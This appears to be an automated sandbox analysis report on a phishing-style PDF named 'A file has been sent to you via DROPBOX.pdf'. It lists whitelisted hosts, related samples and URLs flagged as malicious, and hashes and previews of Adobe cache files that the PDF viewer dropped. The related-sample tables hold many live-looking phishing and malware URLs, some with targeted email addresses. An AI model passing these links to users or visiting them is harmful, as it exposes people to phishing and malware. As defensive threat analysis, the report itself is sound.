                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:defaultwindowspdfcookbook.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:24
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:A file has been sent to you via DROPBOX.pdf
                                                                                    Detection:MAL
                                                                                    Classification:mal56.winPDF@44/95@41/16
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .pdf
                                                                                    • Found PDF document
                                                                                    • Close Viewer
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.88.176, 34.237.241.83, 54.224.241.105, 50.16.47.176, 18.213.11.84, 172.64.41.3, 162.159.61.3, 2.19.126.143, 2.19.126.149, 2.20.77.60, 23.193.114.26, 23.193.114.18, 172.217.19.206, 64.233.164.84, 142.250.181.99, 172.217.17.46, 142.250.181.74, 142.250.181.10, 172.217.17.42, 172.217.17.74, 172.217.19.234, 142.250.181.106, 142.250.181.42, 142.250.181.138, 172.217.19.170, 172.217.19.10, 172.217.19.202, 142.250.181.142, 172.217.17.35, 142.250.181.46, 2.20.41.218, 152.199.19.160, 2.18.64.218, 2.18.64.214, 104.102.41.166, 2.18.64.205, 92.122.145.219, 184.28.90.27, 13.107.246.63, 23.203.104.175, 20.12.23.50
                                                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, assets.onestore.ms.edgekey.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, time.windows.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, acroipm2.adobe.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, mscomajax.vo.msecnd.net, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu-b-net.trafficmanager.net, a1778.g2.akamai.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, e10583.dspg.akamaiedge.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, cs22.wpc.v0cdn.net, ctldl.windowsupdate.com, statics-marketingsites-wcus-ms-com.aka
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: A file has been sent to you via DROPBOX.pdf
                                                                                    TimeTypeDescription
                                                                                    12:48:47API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    104.18.94.41DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                      http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                        https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                          http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                                                            http://office.yacivt.com/wriEcFSZGet hashmaliciousHTMLPhisherBrowse
                                                                                              http://sharefileon.comGet hashmaliciousUnknownBrowse
                                                                                                https://docs.google.com/presentation/d/e/2PACX-1vS4E-28RyhuHX8_MZcsg7wizgGkSwW0LDVl5HNjN-NsvlVsETQwbyEWxbBU714X4OECIwqCDQyWoANZ/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                  https://tekascend.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                    https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                                                                      https://t.co/4MnukUbNZXGet hashmaliciousHTMLPhisherBrowse
                                                                                                        151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-3.3.1.min.js
                                                                                                        http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.min.js
                                                                                                        http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.2.min.js
                                                                                                        http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-3.3.1.min.js
                                                                                                        2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-latest.min.js
                                                                                                        151.101.194.137http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.min.js
                                                                                                        http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.11.3.min.js
                                                                                                        http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.11.3.min.js
                                                                                                        http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.9.1.js
                                                                                                        http://facebooksecurity.blogspot.pe/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.min.js
                                                                                                        https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=demsaenlinea.mx/jahn/00987667839933/utilities@affordablecare.comGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-3.3.1.min.js
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        MRS-efz.ms-acdc.office.comhttps://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWEGet hashmaliciousUnknownBrowse
                                                                                                        • 52.97.168.210
                                                                                                        2024 Tepa LLC RFP Proposal.docxGet hashmaliciousUnknownBrowse
                                                                                                        • 52.98.200.210
                                                                                                        Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                                                                        • 52.97.173.18
                                                                                                        https://protect.checkpoint.com/v2/r01/___https:/vlp6cm34.r.us-east-1.awstrack.me/Q5dmyyux:e7Ke7Kjrfnq.ynintwjuqD.htr*7Kh*7KjOBJBJLTmXFRFSIYBSOlvWZ1QLgoUfHylhY/JnF_riAUpCWczNA0yO_jaB*~*oG6AYM23pBoyDNMJ-PJR-NmPFsN*~*VgZA/PF0HUyICotYzOGFnKvZNBMhC*~*KfYclayEc_La*~*ccZq7wY-S_IKBLwx/KWAAv8MVfzRwNM6LCN8Jigf*~*80C6gkuabRjmLM--7qPAcOAlUFFI__5pCS9Bd6d565556c8b*~*/hi595-9hb*~3*gh-a*~*bg-9bgb-ci5/-b9jf76k5b9g*~*-555555do29l0Y3hHjFJM3POpxyJsMjDY*~*5=957___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmNkMzFiOWRiNjRlNzYwZWExOWZkZjZlZWU4YmI5NjkyOjc6NjQxYjozOTM5M2Y5MjlmZWNkMGUzMGYzMjUxMGFiZDQ0YjU2Mzg5ODdlNDNlNTAyN2VlYjBmMjQxZjc3Mjg5OGNiMWQxOmg6VDpU%3EGet hashmaliciousUnknownBrowse
                                                                                                        • 52.98.200.242
                                                                                                        https://fspspartnerscoza-my.sharepoint.com/:li:/g/personal/marius_fsps-partners_co_za/EyM8LqUnruxJqzXclvfX1UcBxJkUikKNKWmf15Y8WTygEA?e=BgI5avGet hashmaliciousUnknownBrowse
                                                                                                        • 52.98.200.130
                                                                                                        https://www.google.com/url?sa=https://r20.rs6.net/tns.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/d7TO.ifvxdvrhe.ru%2FDflmD%2FGet hashmaliciousUnknownBrowse
                                                                                                        • 40.101.92.18
                                                                                                        ooc-g2.tm-4.office.comhttp://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                                        • 40.99.70.210
                                                                                                        Payment_Failure_Notice_Office365_sdf_[53487].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 52.98.95.210
                                                                                                        https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWEGet hashmaliciousUnknownBrowse
                                                                                                        • 52.98.61.34
                                                                                                        https://simatantincendi.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 40.99.32.114
                                                                                                        https://e.trustifi.com/#/fff2a6/34074b/38c75f/bf3fbd/0d1c47/12c665/f3cdcd/c1be48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d08b7b/9066d9/86c9f0/b1ff53/224fc1/c5dff5/a64e02/f00a15/3cdbea/a78615/4ddb76/30d9f7/98e1a2/9412cb/8e2651/8d4e63/9d313b/2f0213/ae3252/642e4a/6f0b2e/306b49/fd8e03/84bfef/0da4e6/6224c1/902b5e/e0d84c/badeba/3e52c1/94282a/975221/7a2e92/514659/ae5bab/957b7b/eb9e61/6942c6/d917d9/44a5ae/e58297/02048a/55f177/dca75c/c46e68/ac781c/5b787b/abcd53/568132/1d514a/5290de/d0b524/7d0cb6/e4e8bf/2ff215/1ddb69/add914/7674bb/dc5d9b/8fc829/561052/f5a816/40ee64/a0bcf5/b0cc13/8e70a5/255ef2/b24b8d/81e09f/4c70dd/5bbaa4/7ff26c/f1999b/4a2515/4a3a04/0a188eGet hashmaliciousUnknownBrowse
                                                                                                        • 40.99.70.210
                                                                                                        https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.comGet hashmaliciousUnknownBrowse
                                                                                                        • 40.99.70.194
                                                                                                        2024 Tepa LLC RFP Proposal.docxGet hashmaliciousUnknownBrowse
                                                                                                        • 40.99.70.210
                                                                                                        https://docs.google.com/presentation/d/e/2PACX-1vRMxSBYgTIj7bH-OYJSKudpxaekmSD6B-b603kyy-2ygb7TXyfRQC-hU8fjYDSrrObCUBq88ZmRswwh/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                        • 40.99.70.194
                                                                                                        https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                                        • 40.99.70.178
                                                                                                        View_alert_details_#[01KTO].htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 40.99.32.114
                                                                                                        bg.microsoft.map.fastly.netPyIsvSahWy.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 199.232.214.172
                                                                                                        ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 199.232.210.172
                                                                                                        Order_948575494759.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 199.232.214.172
                                                                                                        stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                        • 199.232.214.172
                                                                                                        22TxDBB1.batGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        code.jquery.comhttps://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.66.137
                                                                                                        https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.66.137
                                                                                                        http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpub-c51a5b71098c4a50b29ad0816d037292.r2.dev%2525252Findex.html%25252F1FPh%25252FkO25AQ%25252FAQ%25252F3e065842-509e-4fd5-abbb-5283a8ac4086%25252F1%25252FRkloQ4shWG%252F1FPh%252Fk_25AQ%252FAQ%252Fdde43c95-583c-418a-adc0-08f493a126f6%252F1%252FJb7OErMoyM%2F1FPh%2Fk_25AQ%2FAQ%2Fb4b83026-0c0f-44d4-9e59-6245afb2c831%2F1%2F0MDiG0XvGK/1FPh/le25AQ/AQ/97716a3f-8a20-4219-bc1f-a50876348ddc/1/HkaU6VJ0d2#Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.66.137
                                                                                                        Remit_Advice_SMKT_84655.htmGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.130.137
                                                                                                        http://sharefileon.comGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.130.137
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        FASTLYUSloligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 151.101.153.58
                                                                                                        https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.66.137
                                                                                                        https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://www.grapevine.org/join/next-gen-giving-circle-dcGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.65.229
                                                                                                        http://bluepeak-group.com/fcGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.108
                                                                                                        Ball - Temp.data for GCMs.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 199.232.168.159
                                                                                                        Ball - Temp.data for GCMs.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 199.232.192.193
                                                                                                        DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.66.137
                                                                                                        pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 185.199.110.133
                                                                                                        CLOUDFLARENETUShttps://usps.com-parcelbvxce.vip/i/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.21.4.80
                                                                                                        http://golden1-alert.net/onlineGet hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.218.192
                                                                                                        'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        • 172.67.179.225
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.88.199
                                                                                                        http://files.playanext.com/v8/avast_secure_browser_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.15.96
                                                                                                        https://docs.zoom.us/doc/amQMYMv8RzCj0FS5-u7_7w?from=emailGet hashmaliciousUnknownBrowse
                                                                                                        • 104.18.86.42
                                                                                                        http://johnlewisfinance.qa.uinsure.co.ukGet hashmaliciousUnknownBrowse
                                                                                                        • 1.1.1.1
                                                                                                        securedoc_20241217T163143.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 104.18.11.207
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                        • 104.21.23.76
                                                                                                        FASTLYUSloligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 151.101.153.58
                                                                                                        https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.66.137
                                                                                                        https://sites.google.com/kula.ai/rdps/homeGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://www.grapevine.org/join/next-gen-giving-circle-dcGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.65.229
                                                                                                        http://bluepeak-group.com/fcGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.193.108
                                                                                                        Ball - Temp.data for GCMs.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 199.232.168.159
                                                                                                        Ball - Temp.data for GCMs.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 199.232.192.193
                                                                                                        DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.66.137
                                                                                                        pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 185.199.110.133
                                                                                                        No context
                                                                                                        No context
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):300
                                                                                                        Entropy (8bit):5.166282225549602
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:7PpPM+q2PcNwi2nKuAl9OmbnIFUt8OPpXBAZmw+OPpXBjMVkwOcNwi2nKuAl9Omt:7VM+vLZHAahFUt8O9S/+O99MV54ZHAae
                                                                                                        MD5:D92B5983487F7FB0554ED736F69A3D5F
                                                                                                        SHA1:00B8178DF0356C416EABB309EC1F4F6DEC01735A
                                                                                                        SHA-256:142A7BBAFA65BA0E861F4F06F6251333CF47D69236A5B08A2FE1A49FC8DDFE55
                                                                                                        SHA-512:C6DE699797D838AC3436101EC68EBF3AA5FE2F080E659419FD7B713653F51462EC54C7C4ABBB3121E118F97B8331C24E4C9BCA139FC62B3B4AF4416868399E9D
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2024/12/18-12:48:32.800 1d8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-12:48:32.802 1d8c Recovering log #3.2024/12/18-12:48:32.802 1d8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):300
                                                                                                        Entropy (8bit):5.166282225549602
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:7PpPM+q2PcNwi2nKuAl9OmbnIFUt8OPpXBAZmw+OPpXBjMVkwOcNwi2nKuAl9Omt:7VM+vLZHAahFUt8O9S/+O99MV54ZHAae
                                                                                                        MD5:D92B5983487F7FB0554ED736F69A3D5F
                                                                                                        SHA1:00B8178DF0356C416EABB309EC1F4F6DEC01735A
                                                                                                        SHA-256:142A7BBAFA65BA0E861F4F06F6251333CF47D69236A5B08A2FE1A49FC8DDFE55
                                                                                                        SHA-512:C6DE699797D838AC3436101EC68EBF3AA5FE2F080E659419FD7B713653F51462EC54C7C4ABBB3121E118F97B8331C24E4C9BCA139FC62B3B4AF4416868399E9D
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2024/12/18-12:48:32.800 1d8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-12:48:32.802 1d8c Recovering log #3.2024/12/18-12:48:32.802 1d8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):344
                                                                                                        Entropy (8bit):5.151745507815631
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:7Pp4Iq2PcNwi2nKuAl9Ombzo2jMGIFUt8OPpOZmw+OPpwANzkwOcNwi2nKuAl9OU:7XvLZHAa8uFUt8O4/+OZz54ZHAa8RJ
                                                                                                        MD5:5ED01E3E06123183EDFED0CEB2855E67
                                                                                                        SHA1:944F1B09DA2E51E70488AEC3CE18CE6DFE273450
                                                                                                        SHA-256:B8AC12C32BCE95A11A26E6DBBAA518CF5CB561AB75F09E311DB48677C39F2D9F
                                                                                                        SHA-512:001BC9460A19FB729EB208886E2B4D378B7CFC765C2914F84DAB3F02BF2F9A9D41CE934846C101401AE4819D21C4D31A285C0618A0CB14A95482EF516C054736
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2024/12/18-12:48:32.882 1e00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-12:48:32.884 1e00 Recovering log #3.2024/12/18-12:48:32.885 1e00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):344
                                                                                                        Entropy (8bit):5.151745507815631
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:7Pp4Iq2PcNwi2nKuAl9Ombzo2jMGIFUt8OPpOZmw+OPpwANzkwOcNwi2nKuAl9OU:7XvLZHAa8uFUt8O4/+OZz54ZHAa8RJ
                                                                                                        MD5:5ED01E3E06123183EDFED0CEB2855E67
                                                                                                        SHA1:944F1B09DA2E51E70488AEC3CE18CE6DFE273450
                                                                                                        SHA-256:B8AC12C32BCE95A11A26E6DBBAA518CF5CB561AB75F09E311DB48677C39F2D9F
                                                                                                        SHA-512:001BC9460A19FB729EB208886E2B4D378B7CFC765C2914F84DAB3F02BF2F9A9D41CE934846C101401AE4819D21C4D31A285C0618A0CB14A95482EF516C054736
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2024/12/18-12:48:32.882 1e00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-12:48:32.884 1e00 Recovering log #3.2024/12/18-12:48:32.885 1e00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):475
                                                                                                        Entropy (8bit):4.9740254305760585
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/um3RA8sqd8xsBdOg2H8Acaq3QYiubSpDyP7E4TX:Y2sRdsPidMHs3QYhbSpDa7n7
                                                                                                        MD5:98977DBA0CD8B69AD1411EAFBF548A3B
                                                                                                        SHA1:CBEECAE335CEE434A2264BB2915B4D14AFE34549
                                                                                                        SHA-256:480E0F6C641E5AF82D6274703E46823F9FA59D135071EE24E48014EED84F19D6
                                                                                                        SHA-512:C38F55B93A7B9CF06B59205FA079679AEFAABF62EE9AE45AC4B0C641E79EFF1699C41E747FA67C6310EE75A6AACD80B5F290651B667278B6ED456963AE1389CA
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379104125228208","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":684735},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:modified
                                                                                                        Size (bytes):475
                                                                                                        Entropy (8bit):4.9740254305760585
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/um3RA8sqd8xsBdOg2H8Acaq3QYiubSpDyP7E4TX:Y2sRdsPidMHs3QYhbSpDa7n7
                                                                                                        MD5:98977DBA0CD8B69AD1411EAFBF548A3B
                                                                                                        SHA1:CBEECAE335CEE434A2264BB2915B4D14AFE34549
                                                                                                        SHA-256:480E0F6C641E5AF82D6274703E46823F9FA59D135071EE24E48014EED84F19D6
                                                                                                        SHA-512:C38F55B93A7B9CF06B59205FA079679AEFAABF62EE9AE45AC4B0C641E79EFF1699C41E747FA67C6310EE75A6AACD80B5F290651B667278B6ED456963AE1389CA
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379104125228208","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":684735},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4509
                                                                                                        Entropy (8bit):5.238841617507685
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPrvby/7oZ:CwNw1GHqPySfkcigoO3h28ytPrvby/7S
                                                                                                        MD5:BD403F09343480761C2A33DEECCAEA9D
                                                                                                        SHA1:02E847A568FAE912D3E39887A4384D730D7F44F9
                                                                                                        SHA-256:CD518527190F04BD66383E3AF6C5E1E38C695F2FED35B1D883F9AD886146570C
                                                                                                        SHA-512:87FB4C01B1AD18E29B1573FB64E46DB9E8AC4FE98D52DD817D090EFBAA8B84421C64EC5F91512CBAF8BFDD04D3915BC87E6B57C9C0A36EA0CC91CEC0795AC4BF
                                                                                                        Malicious:false
